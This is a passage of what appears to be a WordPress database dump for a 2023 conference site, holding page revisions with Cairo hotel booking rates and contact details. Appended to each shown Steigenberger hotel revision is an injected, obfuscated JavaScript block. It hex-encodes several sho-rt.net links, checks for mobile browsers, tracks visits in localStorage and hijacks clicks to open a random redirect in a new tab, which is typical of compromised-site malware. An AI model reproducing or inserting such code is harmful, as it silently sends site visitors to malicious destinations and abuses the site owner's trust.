Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-08-02 14:37:38','2023-08-02 14:37:38','',2685,'https://gsw2023.com/?p=5077',0,'revision','',0),
(5078,1,'2023-08-02 14:41:17','2023-08-02 14:41:17','<p>[vc_row][vc_column][vc_column_text]</p>\n<p><!-- wp:paragraph --><strong>For Booking</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong>Superior rooms at the below rate,</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 190 per single room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 210 per double room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong> Deluxe rooms at the below rate,</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 210 per single room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 230 per double room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<h5>2, Kasr El Nil St., P.O. Box 28 Bab El khalq Cairo| Egypt</h5>\n<h5>T +202 2575 0777 | F +202 2574 4333</h5>\n<h5>Email: Reservations.eltahrir@steigenberger.com</h5>\n<h5>ahmed.gaby@steigenberger.com<br />Mobile: +20 100 046 6312</h5>\n<h5> </h5>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Steigenberger Hotel El Tahrir','','inherit','closed','closed','','4771-revision-v1','','','2023-08-02 14:41:17','2023-08-02 14:41:17','',4771,'https://gsw2023.com/?p=5078',0,'revision','',0),
(5079,1,'2023-08-02 14:41:29','2023-08-02 14:41:29','<p>[vc_row][vc_column][vc_column_text]</p>\n<p><!-- wp:paragraph --><strong>For Booking</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong>Superior rooms at the below rate,</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 190 per single room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 210 per double room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong> Deluxe rooms at the below rate,</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 210 per single room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 230 per double room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<h5> </h5>\n<h5>2, Kasr El Nil St., P.O. Box 28 Bab El khalq Cairo| Egypt</h5>\n<h5>T +202 2575 0777 | F +202 2574 4333</h5>\n<h5>Email: Reservations.eltahrir@steigenberger.com</h5>\n<h5>ahmed.gaby@steigenberger.com<br />Mobile: +20 100 046 6312</h5>\n<h5> </h5>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Steigenberger Hotel El Tahrir','','inherit','closed','closed','','4771-revision-v1','','','2023-08-02 14:41:29','2023-08-02 14:41:29','',4771,'https://gsw2023.com/?p=5079',0,'revision','',0),
(5080,1,'2023-08-02 14:44:06','2023-08-02 14:44:06','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" 